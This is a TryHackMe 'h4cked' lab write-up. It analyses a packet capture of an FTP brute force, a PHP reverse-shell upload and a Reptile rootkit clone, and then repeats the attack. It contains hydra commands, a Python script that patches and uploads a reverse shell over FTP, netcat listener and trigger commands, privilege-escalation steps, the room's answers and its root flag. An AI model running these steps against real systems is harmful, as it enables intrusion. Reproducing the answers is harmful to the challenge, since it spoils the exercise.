TryHackMe-h4cked
Find out what happened by analysing a .pcap file and hack your way back into the machine
It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.
Task 1 Oh no! We’ve been hacked!
The attacker is trying to log into a specific service. What service is this?
Open the capture in Wireshark and go to Statistics > Protocol Hierarchy. FTP dominates the application layer in the hierarchy, so the service being targeted is FTP.
Answer: FTP
There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
Answer: hydra
The attacker is trying to log on with a specific username. What is the username?
Right click on the first frame and choose Follow > TCP Stream to reveal the following control-channel exchange:
220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS password
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS 666666
530 Login incorrect.
The attacker keeps brute-forcing jenny's account, re-sending USER jenny with a different PASS on every attempt.
Answer: jenny
What is the user’s password?
In Wireshark, apply the display filter ftp so that only FTP control-channel frames are shown. Scroll down until you see "Response: 230 Login successful." (frame #395). Right click on that frame and follow the TCP stream:
220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS password123
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
PORT 192,168,0,147,225,49
200 PORT command successful. Consider using PASV.
LIST -la
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,0,147,196,163
200 PORT command successful. Consider using PASV.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
SITE CHMOD 777 shell.php
200 SITE CHMOD command ok.
QUIT
221 Goodbye.
Answer: password123
What is the current FTP working directory after the attacker logged in?
The current working directory is shown in the server's 257 reply to the PWD command in the same stream.
Answer: /var/www/html
The attacker uploaded a backdoor. What is the backdoor’s filename?
The STOR command in the same TCP stream shows the name of the uploaded file, and the SITE CHMOD 777 that follows makes it world-writable and executable.
Answer: shell.php
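The questions above (username, password, working directory, uploaded file) are all answered by reading the FTP control channel by hand. The script below does the same extraction programmatically, so it can be run over a saved stream from a capture with thousands of PASS attempts. It is an added example for this write-up, not part of the TryHackMe room; the input format is the plain text that Wireshark's Follow > TCP Stream saves for the port 21 connection, and SAMPLE_STREAM is constructed from the two streams quoted above.

```python
"""Pull credential attempts and post-login actions out of an FTP control-channel
transcript.

Added example for this write-up, not part of the TryHackMe room. Feed it the
text saved from Wireshark's Follow > TCP Stream on the FTP control connection
(port 21). SAMPLE_STREAM is constructed from the two streams quoted in the
write-up; the real capture has many more failed PASS attempts.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_STREAM = """\
220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS password
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS 666666
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS password123
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
TYPE I
200 Switching to Binary mode.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
SITE CHMOD 777 shell.php
200 SITE CHMOD command ok.
QUIT
221 Goodbye.
"""

REPLY_RE = re.compile(r"^(\d{3})[ -](.*)$")   # server side: 3-digit reply code
PWD_RE = re.compile(r'"((?:[^"]|"")*)"')       # RFC 959 quoted path in a 257 reply


@dataclass
class FtpSession:
    attempts: List[Tuple[str, str, bool]] = field(default_factory=list)  # user, pass, ok
    cwd: Optional[str] = None
    uploads: List[str] = field(default_factory=list)
    chmods: List[Tuple[str, str]] = field(default_factory=list)          # file, mode

    @property
    def failed_logins(self) -> int:
        return sum(1 for _, _, ok in self.attempts if not ok)

    @property
    def valid_credentials(self) -> List[Tuple[str, str]]:
        return [(u, p) for u, p, ok in self.attempts if ok]

    @property
    def usernames_tried(self) -> List[str]:
        return sorted({u for u, _, _ in self.attempts})


def parse_ftp_control(text: str) -> FtpSession:
    s = FtpSession()
    user: Optional[str] = None
    pending_pass: Optional[str] = None   # PASS sent, server verdict not yet seen
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line:
            continue
        m = REPLY_RE.match(line)
        if m:
            code, msg = m.groups()
            # 230 = login ok, 530 = login failed; only count them right after a PASS
            if code in ("230", "530") and pending_pass is not None:
                s.attempts.append((user or "", pending_pass, code == "230"))
                pending_pass = None
            elif code == "257":
                q = PWD_RE.search(msg)
                if q:
                    s.cwd = q.group(1).replace('""', '"')
            continue
        verb, _, arg = line.partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb == "USER":
            user = arg
        elif verb == "PASS":
            pending_pass = arg
        elif verb in ("STOR", "STOU", "APPE"):
            s.uploads.append(arg)
        elif verb == "SITE" and arg.upper().startswith("CHMOD"):
            parts = arg.split()          # CHMOD <mode> <file>
            if len(parts) >= 3:
                s.chmods.append((parts[2], parts[1]))
    return s
```

On the constructed sample this reports one username (jenny), two failed logins, the valid pair jenny/password123, a working directory of /var/www/html, one upload (shell.php) and one chmod to 777. A failed-login count in the hundreds against a single username is the Hydra signature; the upload plus SITE CHMOD into a web root is what turns a credential finding into an incident.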
The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
At the bottom of the Follow TCP Stream window, use the stream selector to move two streams forward (stream #18). The upload used active-mode FTP (the PORT commands above), so the file contents travelled over a separate data connection and sit in a different stream from the control channel. This stream contains shell.php, the well-known PHP reverse shell by pentestmonkey; the header comments in the file give the URL where the script is hosted.
Answer: http://pentestmonkey.net/tools/php-reverse-shell
Which command did the attacker manually execute after getting a reverse shell?
Navigate to stream #20 (the reverse-shell connection back to the attacker) to reveal the session below:
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 22:26:54 up  2:21,  1 user,  load average: 0.02, 0.07, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jenny    tty1     -                20:06   37.00s  1.00s  0.14s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ls -la
total 1529956
drwxr-xr-x  23 root root       4096 Feb  1 19:52 .
drwxr-xr-x  23 root root       4096 Feb  1 19:52 ..
drwxr-xr-x   2 root root       4096 Feb  1 20:11 bin
drwxr-xr-x   3 root root       4096 Feb  1 20:15 boot
drwxr-xr-x  18 root root       3880 Feb  1 20:05 dev
drwxr-xr-x  94 root root       4096 Feb  1 22:23 etc
drwxr-xr-x   3 root root       4096 Feb  1 20:05 home
lrwxrwxrwx   1 root root         34 Feb  1 19:52 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root         33 Jul 25  2018 initrd.img.old -> boot/initrd.img-4.15.0-29-generic
drwxr-xr-x  22 root root       4096 Feb  1 22:06 lib
drwxr-xr-x   2 root root       4096 Feb  1 20:08 lib64
drwx------   2 root root      16384 Feb  1 19:49 lost+found
drwxr-xr-x   2 root root       4096 Jul 25  2018 media
drwxr-xr-x   2 root root       4096 Jul 25  2018 mnt
drwxr-xr-x   2 root root       4096 Jul 25  2018 opt
dr-xr-xr-x 117 root root          0 Feb  1 20:23 proc
drwx------   3 root root       4096 Feb  1 22:20 root
drwxr-xr-x  29 root root       1040 Feb  1 22:23 run
drwxr-xr-x   2 root root      12288 Feb  1 20:11 sbin
drwxr-xr-x   4 root root       4096 Feb  1 20:06 snap
drwxr-xr-x   3 root root       4096 Feb  1 20:07 srv
-rw-------   1 root root 1566572544 Feb  1 19:52 swap.img
dr-xr-xr-x  13 root root          0 Feb  1 20:05 sys
drwxrwxrwt   2 root root       4096 Feb  1 22:25 tmp
drwxr-xr-x  10 root root       4096 Jul 25  2018 usr
drwxr-xr-x  14 root root       4096 Feb  1 21:54 var
lrwxrwxrwx   1 root root         31 Feb  1 19:52 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root         30 Jul 25  2018 vmlinuz.old -> boot/vmlinuz-4.15.0-29-generic
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$ su jenny
su jenny
Password: password123
jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: password123
Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# whoami
whoami
root
root@wir3:/# cd
cd
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
git clone https://github.com/f0rb1dd3n/Reptile.git
Cloning into 'Reptile'...
remote: Enumerating objects: 217, done.
remote: Counting objects:   0% (1/217)
remote: Counting objects:   1% (3/217)
remote: Counting objects:   2% (5/217)
remote: Counting objects:   3% (7/217)
remote: Counting objects:   4% (9/217)
remote: Counting objects:   5% (11/217)
[REDACTED]
Resolving deltas:  98% (491/499)
Resolving deltas:  99% (495/499)
Resolving deltas: 100% (499/499)
Resolving deltas: 100% (499/499), done.
root@wir3:~# cd Reptile
cd Reptile
root@wir3:~/Reptile# ls -la
ls -la
total 44
drwxr-xr-x 7 root root 4096 Feb  1 22:27 .
drwx------ 4 root root 4096 Feb  1 22:27 ..
drwxr-xr-x 2 root root 4096 Feb  1 22:27 configs
drwxr-xr-x 8 root root 4096 Feb  1 22:27 .git
-rw-r--r-- 1 root root    8 Feb  1 22:27 .gitignore
-rw-r--r-- 1 root root 1922 Feb  1 22:27 Kconfig
drwxr-xr-x 7 root root 4096 Feb  1 22:27 kernel
-rw-r--r-- 1 root root 1852 Feb  1 22:27 Makefile
-rw-r--r-- 1 root root 2183 Feb  1 22:27 README.md
drwxr-xr-x 4 root root 4096 Feb  1 22:27 scripts
drwxr-xr-x 6 root root 4096 Feb  1 22:27 userland
root@wir3:~/Reptile# make
make
make[1]: Entering directory '/root/Reptile/userland'
Makefile:10: ../.config: No such file or directory
make[1]: *** No rule to make target '../.config'.  Stop.
make[1]: Leaving directory '/root/Reptile/userland'
Makefile:56: recipe for target 'userland_bin' failed
make: *** [userland_bin] Error 2
root@wir3:~/Reptile#
The uname -a, w and id output at the top of the session (and the "can't access tty" notice) were not typed by the attacker: pentestmonkey's shell runs uname -a; w; id; /bin/sh -i as its start-up command, so those lines appear in every session it opens. The first command the attacker entered manually was whoami.
What is the computer’s hostname?
This information is revealed in the uname -a banner at the start of the session (and repeated in every prompt, e.g. www-data@wir3):
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Answer: wir3
Which command did the attacker execute to spawn a new TTY shell?
Answer: python3 -c 'import pty; pty.spawn("/bin/bash")'
Which command was executed to gain a root shell?
The following lines answer the question. Note that after the pty spawn every typed command appears twice in the stream (the attacker's keystrokes followed by the terminal's echo), which is why sudo su and whoami are each repeated:
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# whoami
whoami
root
Answer: sudo su
The attacker downloaded something from GitHub. What is the name of the GitHub project?
The attacker clones a repository from GitHub:
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
Answer: Reptile
The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Answer: rootkit
Reptile is a loadable-kernel-module rootkit for Linux, which is why the tree contains a kernel directory and a Kconfig. In this capture the installation did not get far: make fails immediately because ../.config does not exist (the build was never configured), so the attacker cloned the rootkit but did not load it, at least not during the captured session.
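The questions about the reverse-shell session (first manual command, hostname, TTY spawn, root escalation, GitHub project) are all answered by reading the attacker's commands out of stream #20 while ignoring the output and the pty echoes. The script below reconstructs that command timeline automatically. It is an added example for this write-up, not part of the TryHackMe room; it assumes the input is the text Wireshark saves from Follow > TCP Stream for the reverse shell, and SAMPLE_SESSION is constructed from the stream quoted above with most of the output trimmed.

```python
"""Rebuild the attacker's command timeline from a reverse-shell TCP stream.

Added example for this write-up, not part of the TryHackMe room. Before the
pty spawn, "sh -i" prints "$ " and the typed command lands on the same line;
after it, the terminal echoes every command, so each one shows up twice.
SAMPLE_SESSION is constructed from the stream in the write-up, output trimmed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_SESSION = """\
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ls -la
drwxr-xr-x   3 root root       4096 Feb  1 20:05 home
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$ su jenny
su jenny
Password: password123
jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: password123
    (ALL : ALL) ALL
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# whoami
whoami
root
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
git clone https://github.com/f0rb1dd3n/Reptile.git
Cloning into 'Reptile'...
root@wir3:~/Reptile# make
make
make: *** [userland_bin] Error 2
root@wir3:~/Reptile#
"""

# "$ cmd" before the pty spawn, "user@host:cwd$ cmd" or "user@host:cwd# cmd" after it
PROMPT_RE = re.compile(r"^(?:\$|(?P<user>[\w.-]+)@[\w.-]+:(?P<cwd>\S+?)[$#])\s?(?P<cmd>.*)$")
UNAME_RE = re.compile(r"^Linux (\S+) ")
ID_RE = re.compile(r"^uid=\d+\(([\w.-]+)\)")
PASSWORD_RE = re.compile(r"^(?:Password:|\[sudo\] password for [\w.-]+:)\s*(\S+)$")
GITHUB_RE = re.compile(r"https?://github\.com/[^/\s]+/([^/\s]+?)(?:\.git)?(?:[/\s]|$)")


@dataclass
class Command:
    user: str   # account the prompt belonged to when this was typed
    cwd: str
    cmd: str


@dataclass
class Findings:
    hostname: Optional[str] = None
    timeline: List[Command] = field(default_factory=list)
    passwords: List[str] = field(default_factory=list)   # secrets typed in the clear

    @property
    def first_command(self) -> Optional[str]:
        return self.timeline[0].cmd if self.timeline else None

    @property
    def tty_spawn_command(self) -> Optional[str]:
        return next((c.cmd for c in self.timeline if "pty.spawn" in c.cmd), None)

    @property
    def root_command(self) -> Optional[str]:
        """Last command typed before the prompt first shows root."""
        for i, c in enumerate(self.timeline):
            if c.user == "root" and i > 0:
                return self.timeline[i - 1].cmd
        return None

    @property
    def github_projects(self) -> List[str]:
        return [p for c in self.timeline for p in GITHUB_RE.findall(c.cmd)]


def parse_shell_session(text: str) -> Findings:
    f, user, cwd, last_cmd = Findings(), "?", "?", None
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if last_cmd is not None and line == last_cmd:
            last_cmd = None          # pty echo of the command just recorded
            continue
        last_cmd = None
        if (m := UNAME_RE.match(line)):
            f.hostname = f.hostname or m.group(1)
        elif (m := ID_RE.match(line)):
            user = m.group(1)        # owner of the bare "$ " prompt
        elif (m := PASSWORD_RE.match(line)):
            f.passwords.append(m.group(1))
        elif (m := PROMPT_RE.match(line)):
            if m.group("user"):
                user, cwd = m.group("user"), m.group("cwd")
            cmd = m.group("cmd").strip()
            if cmd:
                f.timeline.append(Command(user, cwd, cmd))
                last_cmd = cmd
    return f
```

Run over the sample, parse_shell_session returns hostname wir3, whoami as the first command, the python3 pty one-liner as the TTY spawn, sudo su as the command that produced the first root prompt, Reptile as the only GitHub project, and both clear-text entries of password123. The echo suppression is deliberately narrow (a line is dropped only when it is byte-identical to the command just recorded), so command output that happens to repeat a word is not lost.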
Hack your way back into the machine
The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!
Run Hydra (or any similar tool) on the FTP service. The attacker might not have chosen a complex password. You might get lucky if you use a common word list.
First, scan the target. There are two open ports, one of which is FTP:
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Let’s replicate the hydra attack we’ve analyzed previously:
kali@kali:/data/hacked/files$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.255.63
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-04 07:51:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.255.63:21/
[21][ftp] host: 10.10.255.63   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-04 07:51:53
Jenny's password is now 987654321 (the attacker changed it from password123 after the captured session).
Change the necessary values inside the web shell and upload it to the webserver
Connect as jenny. You'll notice that we have write access to the folder, and that the attacker's shell.php is still sitting there with mode 777. Download the PHP reverse shell from pentestmonkey, change the $ip and $port values to your attacking machine and listener port, and upload it to the server.
kali@kali:/data/hacked/files$ ftp 10.10.255.63
Connected to 10.10.255.63.
220 Hello FTP World!
Name (10.10.255.63:kali): jenny
331 Please specify the password.
Password: 987654321
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 Feb 01 22:26 .
drwxr-xr-x    3 0        0            4096 Feb 01 21:54 ..
-rw-r--r--    1 1000     1000        10918 Feb 01 21:54 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01 22:26 shell.php
226 Directory send OK.
ftp>
Now, let's upload our reverse shell and, as the attacker did, chmod it to 777 (the ftp client's chmod command is sent to the server as SITE CHMOD):
ftp> put rev.php
local: rev.php remote: rev.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.00 secs (106.8894 MB/s)
ftp> chmod 777 rev.php
200 SITE CHMOD command ok.
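The two manual steps above (edit the callback address in the PHP file, then upload it and chmod it over FTP) are easy to get wrong under time pressure: a forgotten edit leaves the shell calling back to 127.0.0.1:1234. The script below is an added example for this write-up, not the room's or pentestmonkey's code. It patches the $ip and $port assignments and refuses to continue unless exactly one of each was found, then replays the captured FTP sequence (login, TYPE I, STOR, SITE CHMOD) with Python's ftplib. SHELL_TEMPLATE is a constructed stand-in holding only the two lines that matter; the FTP function needs a live target and the host, credentials, IP and port in the usage line are the write-up's values, used here as lab placeholders.

```python
"""Patch the callback address in php-reverse-shell.php and upload it over FTP
the way the captured attacker did: login, TYPE I, STOR, SITE CHMOD 777.

Added example for this write-up, not part of the room or of pentestmonkey's
code. SHELL_TEMPLATE is a constructed stand-in holding only the two
assignments that must be changed; the real file is patched the same way.
upload_backdoor needs a live target and is not exercised offline.
"""
import ftplib
import io
import re
import sys

SHELL_TEMPLATE = """<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
"""

IP_RE = re.compile(r"^(\$ip\s*=\s*)'[^']*'(\s*;)", re.M)
PORT_RE = re.compile(r"^(\$port\s*=\s*)\d+(\s*;)", re.M)


def patch_reverse_shell(src: str, ip: str, port: int) -> str:
    """Return src with $ip/$port pointing at the attacker's listener.

    Refuses the template unless exactly one $ip and one $port assignment are
    found, so a renamed or already-mangled file is never uploaded with the
    default 127.0.0.1:1234 still in it.
    """
    if not 1 <= port <= 65535:
        raise ValueError(f"bad port {port}")
    if "'" in ip or "\n" in ip:
        raise ValueError("ip must not contain quotes or newlines")
    out, n_ip = IP_RE.subn(lambda m: f"{m.group(1)}'{ip}'{m.group(2)}", src)
    out, n_port = PORT_RE.subn(lambda m: f"{m.group(1)}{port}{m.group(2)}", out)
    if n_ip != 1 or n_port != 1:
        raise ValueError("template does not look like php-reverse-shell.php")
    return out


def upload_backdoor(host: str, user: str, password: str, payload: bytes,
                    remote_name: str = "rev.php", mode: str = "777") -> str:
    """Replay the captured FTP sequence. Returns the login directory so the
    caller can confirm the file landed in the web root (/var/www/html here)."""
    with ftplib.FTP(host, timeout=15) as ftp:
        ftp.login(user, password)
        cwd = ftp.pwd()
        # storbinary issues TYPE I before STOR, matching the capture.
        ftp.storbinary(f"STOR {remote_name}", io.BytesIO(payload))
        ftp.sendcmd(f"SITE CHMOD {mode} {remote_name}")
    return cwd


if __name__ == "__main__":
    # usage: python3 upload.py php-reverse-shell.php 10.8.50.72 4444 10.10.255.63 jenny 987654321
    path, ip, port, host, user, pw = sys.argv[1:7]
    with open(path) as fh:
        payload = patch_reverse_shell(fh.read(), ip, int(port)).encode()
    print("uploaded into", upload_backdoor(host, user, pw, payload))
```

Start the listener before running the upload, then request the file over HTTP as in the next step; upload_backdoor only places the file, it does not trigger it.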
Create a listener on the designated port on your attacker machine. Execute the web shell by visiting the .php file on the targeted web server.
Let’s start a listener on port 4444 (or whatever port you have specified in the PHP reverse shell).
kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
And trigger the reverse shell from a second terminal (the request does not return while the shell is alive, because the PHP script only finishes when the socket closes):
kali@kali:/data/hacked/files$ curl -s http://10.10.255.63/rev.php
You should now have a reverse shell.
kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.255.63] 48734
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:12:03 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@wir3:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Become root!
Once connected as www-data, we want to move laterally to jenny using the password found previously (the same password as for FTP):
www-data@wir3:/$ su jenny
Password: 987654321
jenny@wir3:/$
Now, we check jenny’s privileges and see that we can become root:
jenny@wir3:/$ sudo -l
[sudo] password for jenny: 987654321
Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
jenny@wir3:/$ sudo -s
root@wir3:/#
Read the flag.txt file inside the Reptile directory
root@wir3:/# cd /root
root@wir3:/# ls -la
ls -la
total 20
drwx------  3 root root 4096 Feb  2 10:23 .
drwxr-xr-x 22 root root 4096 Feb  2 10:28 ..
lrwxrwxrwx  1 root root    9 Feb  2 10:20 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  7 root root 4096 Feb  2 10:23 Reptile
root@wir3:/# cd Reptile
cd Reptile
root@wir3:/# ls -la
ls -la
total 44
drwxr-xr-x 7 root root 4096 Feb  2 10:23 .
drwx------ 3 root root 4096 Feb  2 10:23 ..
drwxr-xr-x 2 root root 4096 Feb  1 22:27 configs
-rw-r--r-- 1 root root   33 Feb  2 10:23 flag.txt
-rw-r--r-- 1 root root 1922 Feb  1 22:27 Kconfig
drwxr-xr-x 7 root root 4096 Feb  1 22:27 kernel
-rw-r--r-- 1 root root 1852 Feb  1 22:27 Makefile
drwxr-xr-x 2 root root 4096 Feb  1 22:28 output
-rw-r--r-- 1 root root 2183 Feb  1 22:27 README.md
drwxr-xr-x 4 root root 4096 Feb  1 22:27 scripts
drwxr-xr-x 6 root root 4096 Feb  1 22:27 userland
root@wir3:/# cat flag.txt
cat flag.txt
ebcefd66ca4b559d17b440b6e67fd0fd
Root flag: ebcefd66ca4b559d17b440b6e67fd0fd
Note that root's .bash_history is a symlink to /dev/null, so no shell history survived on the box; the packet capture is the only record of what the attacker ran.